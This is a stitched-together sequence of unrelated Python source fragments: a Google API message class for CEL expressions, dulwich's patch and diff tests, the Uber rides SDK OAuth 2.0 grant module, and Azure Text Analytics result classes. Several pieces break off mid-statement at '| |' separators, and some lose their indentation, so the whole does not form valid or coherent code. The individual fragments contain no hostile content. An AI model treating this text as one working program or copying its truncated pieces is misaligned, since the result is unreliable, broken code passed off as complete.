# expression); field numbers are wire-format identifiers.
class Expr(_messages.Message):
r"""Represents a textual expression in the Common Expression Language (CEL)
syntax. CEL is a C-like expression language. The syntax and semantics of CEL
are documented at https://github.com/google/cel-spec. Example (Comparison):
title: "Summary size limit" description: "Determines if a summary is less
than 100 chars" expression: "document.summary.size() < 100" Example
(Equality): title: "Requestor is owner" description: "Determines if
requestor is the document owner" expression: "document.owner ==
request.auth.claims.email" Example (Logic): title: "Public documents"
description: "Determine whether the document should be publicly visible"
expression: "document.type != 'private' && document.type != 'internal'"
Example (Data Manipulation): title: "Notification string" description:
"Create a notification string with a timestamp." expression: "'New message
received at ' + string(document.create_time)" The exact variables and
functions that may be referenced within an expression are determined by the
service that evaluates it. See the service documentation for additional
information.
Fields:
description: Optional. Description of the expression. This is a longer
text which describes the expression, e.g. when hovered over it in a UI.
expression: Textual representation of an expression in Common Expression
Language syntax.
location: Optional. String indicating the location of the expression for
error reporting, e.g. a file name and a position in the file.
title: Optional. Title for the expression, i.e. a short string describing
its purpose. This can be used e.g. in UIs which allow to enter the
expression.
"""
description = _messages.StringField(1)
expression = _messages.StringField(2)
location = _messages.StringField(3)
title = _messages.StringField(4)
class Function(_messages.Message):
r"""A function that can be run to modify blueprint contents.
Messages:
ConfigValue: Optional. KRM resource passed to the function as input. The
entire resource must be no larger than 1024 bytes.
InlineConfigValue: Optional. KRM resource passed to the function as
inlined input. The entire resource must be no larger than 1024 bytes.
Fields:
config: Optional. KRM resource passed to the function as input. The entire
resource must be no larger than 1024 bytes.
gcsConfig: Optional. A Cloud Storage link referencing a KRM yaml file to
use as input to the function. There are no size limitations on this
field. Format: gs://my-bucket/my-directory/my-function-config.yaml
image: Required. Container image to run. Example: `gcr.io/kpt-fn/set-
label`
inlineConfig: Optional. KRM resource passed to the function as inlined
input. The entire resource must be no larger than 1024 bytes.
"""
@encoding.MapUnrecognizedFields('additionalProperties')
class ConfigValue(_messages.Message):
r"""Optional. KRM resource passed to the function as input. The entire
resource must be no larger than 1024 bytes.
Messages:
AdditionalProperty: An additional property for a ConfigValue object.
Fields:
additionalProperties: Properties of the object.
"""
class AdditionalProperty(_messages.Message):
r"""An additional property for a ConfigValue object.
Fields:
key: Name of the additional property.
value: A extra_types.JsonValue attribute.
"""
key = _messages.StringField(1)
value = _messages.MessageField('extra_types.JsonValue', 2)
additionalProperties = | |
# test_patch.py -- tests for patch.py
# Copyright (C) 2010 <NAME> <<EMAIL>>
#
# Dulwich is dual-licensed under the Apache License, Version 2.0 and the GNU
# General Public License as public by the Free Software Foundation; version 2.0
# or (at your option) any later version. You can redistribute it and/or
# modify it under the terms of either of these two licenses.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# You should have received a copy of the licenses; if not, see
# <http://www.gnu.org/licenses/> for a copy of the GNU General Public License
# and <http://www.apache.org/licenses/LICENSE-2.0> for a copy of the Apache
# License, Version 2.0.
#
"""Tests for patch.py."""
from io import BytesIO, StringIO
from dulwich.objects import (
Blob,
Commit,
S_IFGITLINK,
Tree,
)
from dulwich.object_store import (
MemoryObjectStore,
)
from dulwich.patch import (
get_summary,
git_am_patch_split,
write_blob_diff,
write_commit_patch,
write_object_diff,
write_tree_diff,
)
from dulwich.tests import (
SkipTest,
TestCase,
)
# Golden-output tests: they assert the exact byte layout produced by
# write_commit_patch, so the literals below must not be reformatted.
class WriteCommitPatchTests(TestCase):
def test_simple_bytesio(self):
# Build a minimal commit and render it as a git-format-patch style
# message into an in-memory buffer, then check the header lines.
f = BytesIO()
c = Commit()
c.committer = c.author = b"Jelmer <<EMAIL>>"
c.commit_time = c.author_time = 1271350201
c.commit_timezone = c.author_timezone = 0
c.message = b"This is the first line\nAnd this is the second line.\n"
c.tree = Tree().id
write_commit_patch(f, c, b"CONTENTS", (1, 1), version="custom")
f.seek(0)
lines = f.readlines()
self.assertTrue(
lines[0].startswith(b"From 0b0d34d1b5b596c928adc9a727a4b9e03d025298")
)
self.assertEqual(lines[1], b"From: Jelmer <<EMAIL>>\n")
self.assertTrue(lines[2].startswith(b"Date: "))
self.assertEqual(
[
b"Subject: [PATCH 1/1] This is the first line\n",
b"And this is the second line.\n",
b"\n",
b"\n",
b"---\n",
],
lines[3:8],
)
self.assertEqual([b"CONTENTS-- \n", b"custom\n"], lines[-2:])
if len(lines) >= 12:
# diffstat may not be present
self.assertEqual(lines[8], b" 0 files changed\n")
# Tests for git_am_patch_split: parsing "git am"-style patch mails into
# (commit, diff, version). The embedded patch texts are byte-exact
# fixtures — do not re-wrap or re-indent them.
class ReadGitAmPatch(TestCase):
def test_extract_string(self):
# Text-mode (str) input with an explicit encoding argument.
text = b"""\
From ff643aae102d8870cac88e8f007e70f58f3a7363 Mon Sep 17 00:00:00 2001
From: <NAME> <<EMAIL>>
Date: Thu, 15 Apr 2010 15:40:28 +0200
Subject: [PATCH 1/2] Remove executable bit from prey.ico (triggers a warning).
---
pixmaps/prey.ico | Bin 9662 -> 9662 bytes
1 files changed, 0 insertions(+), 0 deletions(-)
mode change 100755 => 100644 pixmaps/prey.ico
--
1.7.0.4
"""
c, diff, version = git_am_patch_split(StringIO(text.decode("utf-8")), "utf-8")
self.assertEqual(b"<NAME> <<EMAIL>>", c.committer)
self.assertEqual(b"<NAME> <<EMAIL>>", c.author)
self.assertEqual(
b"Remove executable bit from prey.ico " b"(triggers a warning).\n",
c.message,
)
self.assertEqual(
b""" pixmaps/prey.ico | Bin 9662 -> 9662 bytes
1 files changed, 0 insertions(+), 0 deletions(-)
mode change 100755 => 100644 pixmaps/prey.ico
""",
diff,
)
self.assertEqual(b"1.7.0.4", version)
def test_extract_bytes(self):
# Same fixture as above, parsed directly from bytes.
text = b"""\
From ff643aae102d8870cac88e8f007e70f58f3a7363 Mon Sep 17 00:00:00 2001
From: <NAME> <<EMAIL>>
Date: Thu, 15 Apr 2010 15:40:28 +0200
Subject: [PATCH 1/2] Remove executable bit from prey.ico (triggers a warning).
---
pixmaps/prey.ico | Bin 9662 -> 9662 bytes
1 files changed, 0 insertions(+), 0 deletions(-)
mode change 100755 => 100644 pixmaps/prey.ico
--
1.7.0.4
"""
c, diff, version = git_am_patch_split(BytesIO(text))
self.assertEqual(b"<NAME> <<EMAIL>>", c.committer)
self.assertEqual(b"<NAME> <<EMAIL>>", c.author)
self.assertEqual(
b"Remove executable bit from prey.ico " b"(triggers a warning).\n",
c.message,
)
self.assertEqual(
b""" pixmaps/prey.ico | Bin 9662 -> 9662 bytes
1 files changed, 0 insertions(+), 0 deletions(-)
mode change 100755 => 100644 pixmaps/prey.ico
""",
diff,
)
self.assertEqual(b"1.7.0.4", version)
def test_extract_spaces(self):
# A Subject: header folded across two lines must be unfolded into a
# single message line.
text = b"""From ff643aae102d8870cac88e8f007e70f58f3a7363 Mon Sep 17 00:00:00 2001
From: <NAME> <<EMAIL>>
Date: Thu, 15 Apr 2010 15:40:28 +0200
Subject: [Dulwich-users] [PATCH] Added unit tests for
dulwich.object_store.tree_lookup_path.
* dulwich/tests/test_object_store.py
(TreeLookupPathTests): This test case contains a few tests that ensure the
tree_lookup_path function works as expected.
---
pixmaps/prey.ico | Bin 9662 -> 9662 bytes
1 files changed, 0 insertions(+), 0 deletions(-)
mode change 100755 => 100644 pixmaps/prey.ico
--
1.7.0.4
"""
c, diff, version = git_am_patch_split(BytesIO(text), "utf-8")
self.assertEqual(
b"""\
Added unit tests for dulwich.object_store.tree_lookup_path.
* dulwich/tests/test_object_store.py
(TreeLookupPathTests): This test case contains a few tests that ensure the
tree_lookup_path function works as expected.
""",
c.message,
)
def test_extract_pseudo_from_header(self):
# A "From:" pseudo-header inside the body overrides the mail header
# as the commit author.
text = b"""From ff643aae102d8870cac88e8f007e70f58f3a7363 Mon Sep 17 00:00:00 2001
From: <NAME> <<EMAIL>>
Date: Thu, 15 Apr 2010 15:40:28 +0200
Subject: [Dulwich-users] [PATCH] Added unit tests for
dulwich.object_store.tree_lookup_path.
From: <NAME> <<EMAIL>>
* dulwich/tests/test_object_store.py
(TreeLookupPathTests): This test case contains a few tests that ensure the
tree_lookup_path function works as expected.
---
pixmaps/prey.ico | Bin 9662 -> 9662 bytes
1 files changed, 0 insertions(+), 0 deletions(-)
mode change 100755 => 100644 pixmaps/prey.ico
--
1.7.0.4
"""
c, diff, version = git_am_patch_split(BytesIO(text), "utf-8")
self.assertEqual(b"<NAME> <<EMAIL>>", c.author)
self.assertEqual(
b"""\
Added unit tests for dulwich.object_store.tree_lookup_path.
* dulwich/tests/test_object_store.py
(TreeLookupPathTests): This test case contains a few tests that ensure the
tree_lookup_path function works as expected.
""",
c.message,
)
def test_extract_no_version_tail(self):
# Without a "-- <version>" trailer the parsed version must be None.
text = b"""\
From ff643aae102d8870cac88e8f007e70f58f3a7363 Mon Sep 17 00:00:00 2001
From: <NAME> <<EMAIL>>
Date: Thu, 15 Apr 2010 15:40:28 +0200
Subject: [Dulwich-users] [PATCH] Added unit tests for
dulwich.object_store.tree_lookup_path.
From: <NAME> <<EMAIL>>
---
pixmaps/prey.ico | Bin 9662 -> 9662 bytes
1 files changed, 0 insertions(+), 0 deletions(-)
mode change 100755 => 100644 pixmaps/prey.ico
"""
c, diff, version = git_am_patch_split(BytesIO(text), "utf-8")
self.assertEqual(None, version)
def test_extract_mercurial(self):
# Skipped: documents the desired behaviour for Mercurial-style
# patch mails; the code after the raise is intentionally unreachable.
raise SkipTest(
"git_am_patch_split doesn't handle Mercurial patches " "properly yet"
)
expected_diff = """\
diff --git a/dulwich/tests/test_patch.py b/dulwich/tests/test_patch.py
--- a/dulwich/tests/test_patch.py
+++ b/dulwich/tests/test_patch.py
@@ -158,7 +158,7 @@
'''
c, diff, version = git_am_patch_split(BytesIO(text))
- self.assertIs(None, version)
+ self.assertEqual(None, version)
class DiffTests(TestCase):
"""
text = (
"""\
From dulwich-users-bounces+<EMAIL>mer=sam<EMAIL>@lists.launchpad.net \
Mon Nov 29 00:58:18 2010
Date: Sun, 28 Nov 2010 17:57:27 -0600
From: <NAME> <<EMAIL>>
To: dulwich-users <<EMAIL>>
Subject: [Dulwich-users] [PATCH] test_patch: fix tests on Python 2.6
Content-Transfer-Encoding: 8bit
Change-Id: I5e51313d4ae3a65c3f00c665002a7489121bb0d6
%s
_______________________________________________
Mailing list: https://launchpad.net/~dulwich-users
Post to : <EMAIL>
Unsubscribe : https://launchpad.net/~dulwich-users
More help : https://help.launchpad.net/ListHelp
"""
% expected_diff
)
c, diff, version = git_am_patch_split(BytesIO(text))
self.assertEqual(expected_diff, diff)
self.assertEqual(None, version)
class DiffTests(TestCase):
"""Tests for write_blob_diff and write_tree_diff."""
def test_blob_diff(self):
# Diff between two one-line-changed blobs: exact unified-diff bytes,
# including the short-hash index line, are asserted.
f = BytesIO()
write_blob_diff(
f,
(b"foo.txt", 0o644, Blob.from_string(b"old\nsame\n")),
(b"bar.txt", 0o644, Blob.from_string(b"new\nsame\n")),
)
self.assertEqual(
[
b"diff --git a/foo.txt b/bar.txt",
b"index 3b0f961..a116b51 644",
b"--- a/foo.txt",
b"+++ b/bar.txt",
b"@@ -1,2 +1,2 @@",
b"-old",
b"+new",
b" same",
],
f.getvalue().splitlines(),
)
def test_blob_add(self):
# Old side is (None, None, None): the diff must use the
# "new file mode" header and /dev/null as the old path.
f = BytesIO()
write_blob_diff(
f,
(None, None, None),
(b"bar.txt", 0o644, Blob.from_string(b"new\nsame\n")),
)
self.assertEqual(
[
b"diff --git a/bar.txt b/bar.txt",
b"new file mode 644",
b"index 0000000..a116b51",
b"--- /dev/null",
b"+++ b/bar.txt",
b"@@ -0,0 +1,2 @@",
b"+new",
b"+same",
],
f.getvalue().splitlines(),
)
def test_blob_remove(self):
# New side is (None, None, None): the diff must use the
# "deleted file mode" header and /dev/null as the new path.
f = BytesIO()
write_blob_diff(
f,
(b"bar.txt", 0o644, Blob.from_string(b"new\nsame\n")),
(None, None, None),
)
self.assertEqual(
[
b"diff --git a/bar.txt b/bar.txt",
b"deleted file mode 644",
b"index a116b51..0000000",
b"--- a/bar.txt",
b"+++ /dev/null",
b"@@ -1,2 +0,0 @@",
b"-new",
b"-same",
],
f.getvalue().splitlines(),
)
def test_tree_diff(self):
# Two trees with one added, one removed, one changed and one
# unchanged entry; write_tree_diff must emit add/change/delete
# sections in path order and skip the unchanged file.
f = BytesIO()
store = MemoryObjectStore()
added = Blob.from_string(b"add\n")
removed = Blob.from_string(b"removed\n")
changed1 = Blob.from_string(b"unchanged\nremoved\n")
changed2 = Blob.from_string(b"unchanged\nadded\n")
unchanged = Blob.from_string(b"unchanged\n")
tree1 = Tree()
tree1.add(b"removed.txt", 0o644, removed.id)
tree1.add(b"changed.txt", 0o644, changed1.id)
tree1.add(b"unchanged.txt", 0o644, changed1.id)
tree2 = Tree()
tree2.add(b"added.txt", 0o644, added.id)
tree2.add(b"changed.txt", 0o644, changed2.id)
tree2.add(b"unchanged.txt", 0o644, changed1.id)
store.add_objects(
[
(o, None)
for o in [
tree1,
tree2,
added,
removed,
changed1,
changed2,
unchanged,
]
]
)
write_tree_diff(f, store, tree1.id, tree2.id)
self.assertEqual(
[
b"diff --git a/added.txt b/added.txt",
b"new file mode 644",
b"index 0000000..76d4bb8",
b"--- /dev/null",
b"+++ b/added.txt",
b"@@ -0,0 +1 @@",
b"+add",
b"diff --git a/changed.txt b/changed.txt",
b"index bf84e48..1be2436 644",
b"--- a/changed.txt",
b"+++ b/changed.txt",
b"@@ -1,2 +1,2 @@",
b" unchanged",
b"-removed",
b"+added",
b"diff --git a/removed.txt b/removed.txt",
b"deleted file mode 644",
b"index 2c3f0b3..0000000",
b"--- a/removed.txt",
b"+++ /dev/null",
b"@@ -1 +0,0 @@",
b"-removed",
],
f.getvalue().splitlines(),
)
def test_tree_diff_submodule(self):
# Submodule (gitlink) entries diff as "Subproject commit <sha>"
# lines with mode 160000 in the index header.
f = BytesIO()
store = MemoryObjectStore()
tree1 = Tree()
tree1.add(
b"asubmodule",
S_IFGITLINK,
b"06d0bdd9e2e20377b3180e4986b14c8549b393e4",
)
tree2 = Tree()
tree2.add(
b"asubmodule",
S_IFGITLINK,
b"cc975646af69f279396d4d5e1379ac6af80ee637",
)
store.add_objects([(o, None) for o in [tree1, tree2]])
write_tree_diff(f, store, tree1.id, tree2.id)
self.assertEqual(
[
b"diff --git a/asubmodule b/asubmodule",
b"index 06d0bdd..cc97564 160000",
b"--- a/asubmodule",
b"+++ b/asubmodule",
b"@@ -1 +1 @@",
b"-Subproject commit <PASSWORD>",
b"+Subproject commit <PASSWORD>",
],
f.getvalue().splitlines(),
)
def test_object_diff_blob(self):
# write_object_diff looks the blobs up in the store by SHA, then
# produces the same output as write_blob_diff.
f = BytesIO()
b1 = Blob.from_string(b"old\nsame\n")
b2 = Blob.from_string(b"new\nsame\n")
store = MemoryObjectStore()
store.add_objects([(b1, None), (b2, None)])
write_object_diff(
f, store, (b"foo.txt", 0o644, b1.id), (b"bar.txt", 0o644, b2.id)
)
self.assertEqual(
[
b"diff --git a/foo.txt b/bar.txt",
b"index 3b0f961..a116b51 644",
b"--- a/foo.txt",
b"+++ b/bar.txt",
b"@@ -1,2 +1,2 @@",
b"-old",
b"+new",
b" same",
],
f.getvalue().splitlines(),
)
def test_object_diff_add_blob(self):
# Addition via store lookup: old side absent, "new file mode" header.
f = BytesIO()
store = MemoryObjectStore()
b2 = Blob.from_string(b"new\nsame\n")
store.add_object(b2)
write_object_diff(f, store, (None, None, None), (b"bar.txt", 0o644, b2.id))
self.assertEqual(
[
b"diff --git a/bar.txt b/bar.txt",
b"new file mode 644",
b"index 0000000..a116b51",
b"--- /dev/null",
b"+++ b/bar.txt",
b"@@ -0,0 +1,2 @@",
b"+new",
b"+same",
],
f.getvalue().splitlines(),
)
def test_object_diff_remove_blob(self):
# Deletion via store lookup: new side absent, "deleted file mode" header.
f = BytesIO()
b1 = Blob.from_string(b"new\nsame\n")
store = MemoryObjectStore()
store.add_object(b1)
write_object_diff(f, store, (b"bar.txt", 0o644, b1.id), (None, None, None))
self.assertEqual(
[
b"diff --git a/bar.txt b/bar.txt",
b"deleted file mode 644",
b"index a116b51..0000000",
b"--- a/bar.txt",
b"+++ /dev/null",
b"@@ -1,2 +0,0 @@",
b"-new",
b"-same",
],
f.getvalue().splitlines(),
)
def test_object_diff_bin_blob_force(self):
f = BytesIO()
# Prepare two slightly different PNG headers
| |
# Copyright (c) 2016 Uber Technologies, Inc.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
"""An internal module to handle OAuth 2.0 Authorization.
There are three ways you may obtain an access token:
- Authorization Code Grant
- Implicit Grant
- Client Credentials Grant
Each OAuth 2.0 grant uses your app credentials to start an
authorization process with Uber. Upon successful authorization,
a Session is created, which stores the OAuth 2.0 credentials.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from collections import OrderedDict
from random import SystemRandom
from requests import codes
from requests import post
from string import ascii_letters
from string import digits
try:
from urllib.parse import parse_qs
from urllib.parse import urlparse
except ImportError:
from urlparse import parse_qs
from urlparse import urlparse
from uber_rides.errors import ClientError
from uber_rides.errors import UberIllegalState
from uber_rides.session import OAuth2Credential
from uber_rides.session import Session
from uber_rides.utils import auth
from uber_rides.utils.request import build_url
class OAuth2(object):
    """Base class shared by all OAuth 2.0 grant types."""

    def __init__(self, client_id, scopes):
        """Initialize OAuth 2.0 Class.

        Parameters
            client_id (str)
                Your app's Client ID.
            scopes (set)
                Set of permission scopes to request.
                (e.g. {'profile', 'history'}) Keep this list minimal so
                users feel safe granting your app access to their information.
        """
        self.client_id = client_id
        self.scopes = scopes

    def _build_authorization_request_url(
        self,
        response_type,
        redirect_url,
        state=None
    ):
        """Form URL to request an auth code or access token.

        Parameters
            response_type (str)
                Either 'code' (Authorization Code Grant) or
                'token' (Implicit Grant).
            redirect_url (str)
                The HTTPS (or localhost HTTP) URL registered with your app
                that Uber redirects the user back to after authorization.
            state (str)
                Optional CSRF State token to send to the server.

        Returns
            (str)
                The fully constructed authorization request URL.

        Raises
            UberIllegalState (ApiError)
                Raised if response_type parameter is invalid.
        """
        if response_type not in auth.VALID_RESPONSE_TYPES:
            raise UberIllegalState(
                '{} is not a valid response type.'.format(response_type)
            )
        # OrderedDict keeps the query parameters in this exact order
        # when the URL is built.
        query = OrderedDict()
        query['scope'] = ' '.join(self.scopes)
        query['state'] = state
        query['redirect_uri'] = redirect_url
        query['response_type'] = response_type
        query['client_id'] = self.client_id
        return build_url(auth.AUTH_HOST, auth.AUTHORIZE_PATH, query)

    def _extract_query(self, redirect_url):
        """Extract query parameters from a redirect URL.

        Parameters
            redirect_url (str)
                The full URL that the Uber server redirected to after
                the user authorized your app.

        Returns
            (dict)
                A dictionary of query parameters (first value per key).
        """
        parts = urlparse(redirect_url)
        # Implicit Grant redirect_urls carry data after the fragment (#);
        # every other grant carries data after the query identifier (?).
        if isinstance(self, ImplicitGrant):
            raw_query = parts.fragment
        else:
            raw_query = parts.query
        return {key: values[0] for key, values in parse_qs(raw_query).items()}
class AuthorizationCodeGrant(OAuth2):
    """Class for Authorization Code Grant type.

    The authorization code grant type is used to obtain both access
    tokens and refresh tokens and is optimized for confidential clients.
    It involves a two-step authorization process. The first step is having
    the user authorize your app. The second involves getting an OAuth 2.0
    access token from Uber.
    """

    def __init__(
        self,
        client_id,
        scopes,
        client_secret,
        redirect_url,
        state_token=None,
    ):
        """Initialize AuthorizationCodeGrant Class.

        Parameters
            client_id (str)
                Your app's Client ID.
            scopes (set)
                Set of permission scopes to request.
                (e.g. {'profile', 'history'}) Keep this list minimal so
                users feel safe granting your app access to their information.
            client_secret (str)
                Your app's Client Secret.
            redirect_url (str)
                The URL that the Uber server will redirect the user to after
                finishing authorization. The redirect must be HTTPS-based and
                match the URL you registered your application with. Localhost
                URLs are permitted and can be either HTTP or HTTPS.
            state_token (str)
                The CSRF State Token used to create an authorization.
                A random token is generated when none is supplied.
        """
        super(AuthorizationCodeGrant, self).__init__(client_id, scopes)
        self.redirect_url = redirect_url
        self.client_secret = client_secret
        # Reuse a caller-supplied token (e.g. persisted across web-server
        # requests); otherwise mint a fresh random one.
        if state_token is not None:
            self.state_token = state_token
        else:
            self.state_token = self._generate_state_token()

    def _generate_state_token(self, length=32):
        """Generate CSRF State Token.

        CSRF State Tokens are passed as a parameter in the authorization
        URL and are checked when receiving responses from the Uber Auth
        server to prevent request forgery.
        """
        # SystemRandom draws from the OS entropy source, so the token is
        # suitable for security use (unlike the default random generator).
        choices = ascii_letters + digits
        return ''.join(SystemRandom().choice(choices) for _ in range(length))

    def get_authorization_url(self):
        """Start the Authorization Code Grant process.

        This function starts the OAuth 2.0 authorization process and builds an
        authorization URL. You should redirect your user to this URL, where
        they can grant your application access to their Uber account.

        Returns
            (str)
                The fully constructed authorization request URL.
                Tell the user to visit this URL and approve your app.
        """
        return self._build_authorization_request_url(
            response_type=auth.CODE_RESPONSE_TYPE,
            redirect_url=self.redirect_url,
            state=self.state_token,
        )

    def _verify_query(self, query_params):
        """Verify response from the Uber Auth server.

        Parameters
            query_params (dict)
                Dictionary of query parameters attached to your redirect URL
                after user approved your app and was redirected.

        Returns
            authorization_code (str)
                Code received when user grants your app access. Use this code
                to request an access token.

        Raises
            UberIllegalState (ApiError)
                Thrown if the redirect URL was missing parameters or if the
                given parameters were not valid.
        """
        error_message = None
        # Check CSRF State Token against returned state token from GET request.
        # The order matters: missing parameter, missing session token, then
        # mismatch — each produces a distinct error message.
        received_state_token = query_params.get('state')
        if received_state_token is None:
            error_message = 'Bad Request. Missing state parameter.'
            raise UberIllegalState(error_message)
        if self.state_token is None:
            error_message = 'Missing CSRF State Token in session.'
            raise UberIllegalState(error_message)
        if self.state_token != received_state_token:
            error_message = 'CSRF Error. Expected {}, got {}'
            error_message = error_message.format(
                self.state_token,
                received_state_token,
            )
            raise UberIllegalState(error_message)
        # Verify exactly one of the 'code' / 'error' parameters exists —
        # both set or neither set indicates a malformed redirect.
        error = query_params.get('error')
        authorization_code = query_params.get(auth.CODE_RESPONSE_TYPE)
        if error and authorization_code:
            error_message = (
                'Code and Error query params code and error '
                'can not both be set.'
            )
            raise UberIllegalState(error_message)
        if error is None and authorization_code is None:
            error_message = 'Neither query parameter code or error is set.'
            raise UberIllegalState(error_message)
        if error:
            raise UberIllegalState(error)
        return authorization_code

    def get_session(self, redirect_url):
        """Complete the Authorization Code Grant process.

        The redirect URL received after the user has authorized
        your application contains an authorization code. Use this
        authorization code to request an access token.

        Parameters
            redirect_url (str)
                The full URL that the Uber server redirected to after
                the user authorized your app.

        Returns
            (Session)
                A Session object with OAuth 2.0 credentials.

        Raises
            UberIllegalState (ApiError)
                Propagated from _verify_query on a malformed redirect.
        """
        query_params = self._extract_query(redirect_url)
        authorization_code = self._verify_query(query_params)
        # Exchange the one-time authorization code for an access token.
        response = _request_access_token(
            grant_type=auth.AUTHORIZATION_CODE_GRANT,
            client_id=self.client_id,
            client_secret=self.client_secret,
            code=authorization_code,
            redirect_url=self.redirect_url,
        )
        oauth2credential = OAuth2Credential.make_from_response(
            response=response,
            grant_type=auth.AUTHORIZATION_CODE_GRANT,
            client_id=self.client_id,
            client_secret=self.client_secret,
            redirect_url=self.redirect_url,
        )
        return Session(oauth2credential=oauth2credential)
class ImplicitGrant(OAuth2):
"""Class for Implicit Grant type.
The implicit grant type is used to obtain access tokens and is optimized
for public clients under a particular redirect URI. It does not
refresh access tokens.
Unlike the authorization code grant type, in which the client makes
separate requests for authorization and access token, the client
receives the access token as the result of the authorization request.
"""
def __init__(self, client_id, scopes, redirect_url):
"""Initialize ImplicitGrant Class.
Parameters
client_id (str)
Your app's Client ID.
scopes (set)
Set of permission scopes to request.
(e.g. {'profile', 'history'}) Keep this list minimal so
users feel safe granting your app access to their information.
redirect_url (str)
The URL that the Uber server will redirect the user to after
finishing authorization. The redirect must be HTTPS-based and
match the URL you registered your application with. Localhost
URLs are permitted and can be either HTTP or | |
document.
:type id: str
:param entities: Recognized well-known entities in the document.
:type entities:
list[~azure.ai.textanalytics.LinkedEntity]
:param statistics: If show_stats=true was specified in the request this
field will contain information about the document payload.
:type statistics:
~azure.ai.textanalytics.TextDocumentStatistics
:param bool is_error: Boolean check for error item when iterating over list of
results. Always False for an instance of a RecognizeLinkedEntitiesResult.
"""
def __init__(self, **kwargs):
    """Populate result fields from keyword arguments; never an error item."""
    for field in ("id", "entities", "statistics"):
        setattr(self, field, kwargs.get(field, None))
    self.is_error = False
def __repr__(self):
    """Debug representation, truncated to 1024 characters."""
    template = "RecognizeLinkedEntitiesResult(id={}, entities={}, statistics={}, is_error={})"
    return template.format(self.id, repr(self.entities),
                           repr(self.statistics), self.is_error)[:1024]
class AnalyzeSentimentResult(DictMixin):
    """Overall predicted sentiment and confidence scores for a document,
    plus per-sentence sentiment predictions with scores.

    Attributes:
        id (str): Unique, non-empty document identifier matching the id
            passed in with the request (assigned by the service if absent).
        sentiment (str): Predicted document sentiment. Possible values:
            'positive', 'neutral', 'negative', 'mixed'.
        statistics (~azure.ai.textanalytics.TextDocumentStatistics):
            Payload statistics, populated when show_stats=true was requested.
        confidence_scores (~azure.ai.textanalytics.SentimentConfidenceScores):
            Document-level confidence scores between 0 and 1 per label.
        sentences (list[~azure.ai.textanalytics.SentenceSentiment]):
            Sentence-level sentiment analysis.
        is_error (bool): Always False for an AnalyzeSentimentResult.
    """

    def __init__(self, **kwargs):
        for field in ("id", "sentiment", "statistics",
                      "confidence_scores", "sentences"):
            setattr(self, field, kwargs.get(field, None))
        self.is_error = False

    def __repr__(self):
        template = ("AnalyzeSentimentResult(id={}, sentiment={}, statistics={}, "
                    "confidence_scores={}, sentences={}, is_error={})")
        text = template.format(self.id, self.sentiment, repr(self.statistics),
                               repr(self.confidence_scores),
                               repr(self.sentences), self.is_error)
        return text[:1024]
class TextDocumentStatistics(DictMixin):
    """Statistics about an individual document payload.

    Attributes:
        grapheme_count (int): Number of text elements recognized in
            the document.
        transaction_count (int): Number of transactions for the document.
    """

    def __init__(self, **kwargs):
        for field in ("grapheme_count", "transaction_count"):
            setattr(self, field, kwargs.get(field, None))

    @classmethod
    def _from_generated(cls, stats):
        # The service omits statistics unless show_stats=true was requested.
        if stats is None:
            return None
        return cls(grapheme_count=stats.characters_count,
                   transaction_count=stats.transactions_count)

    def __repr__(self):
        return ("TextDocumentStatistics(grapheme_count={}, transaction_count={})"
                .format(self.grapheme_count, self.transaction_count)[:1024])
class DocumentError(DictMixin):
    """DocumentError is an error object which represents an error on
    the individual document.

    :param id: Unique, non-empty document identifier that matches the
        document id that was passed in with the request. If not specified
        in the request, an id is assigned for the document.
    :type id: str
    :param error: The document error.
    :type error: ~azure.ai.textanalytics.TextAnalyticsError
    :param bool is_error: Boolean check for error item when iterating over list of
        results. Always True for an instance of a DocumentError.
    """

    def __init__(self, **kwargs):
        self.id = kwargs.get("id", None)
        self.error = kwargs.get("error", None)
        self.is_error = True

    def __getattr__(self, attr):
        """Raise a descriptive AttributeError when a result-only attribute
        is accessed on an error item, so the service failure surfaces
        instead of a generic missing-attribute message.
        """
        # Union of every attribute exposed by the non-error result types.
        # Fix: pass each keys() result to update() directly instead of
        # concatenating them with '+', which raises TypeError if keys()
        # ever returns a view object rather than a list.
        result_set = set()
        result_set.update(
            RecognizeEntitiesResult().keys(),
            RecognizePiiEntitiesResult().keys(),
            DetectLanguageResult().keys(),
            RecognizeLinkedEntitiesResult().keys(),
            AnalyzeSentimentResult().keys(),
            ExtractKeyPhrasesResult().keys(),
        )
        result_attrs = result_set.difference(DocumentError().keys())
        if attr in result_attrs:
            raise AttributeError(
                "'DocumentError' object has no attribute '{}'. The service was unable to process this document:\n"
                "Document Id: {}\nError: {} - {}\n".
                format(attr, self.id, self.error.code, self.error.message)
            )
        raise AttributeError("'DocumentError' object has no attribute '{}'".format(attr))

    @classmethod
    def _from_generated(cls, doc_err):
        """Build a DocumentError from the autorest-generated model."""
        return cls(
            id=doc_err.id,
            error=TextAnalyticsError._from_generated(doc_err.error),  # pylint: disable=protected-access
            is_error=True
        )

    def __repr__(self):
        return "DocumentError(id={}, error={}, is_error={})" \
            .format(self.id, repr(self.error), self.is_error)[:1024]
class DetectLanguageInput(LanguageInput):
    """A single document to be analyzed for language detection.

    Attributes:
        id (str): Required. Unique, non-empty document identifier.
        text (str): Required. The input text to process.
        country_hint (str): ISO 3166-1 alpha-2 two-letter country code that
            helps detect the language. Defaults to "US"; pass the string
            "none" to disable the hint.
    """

    def __init__(self, **kwargs):
        super(DetectLanguageInput, self).__init__(**kwargs)
        for field in ("id", "text", "country_hint"):
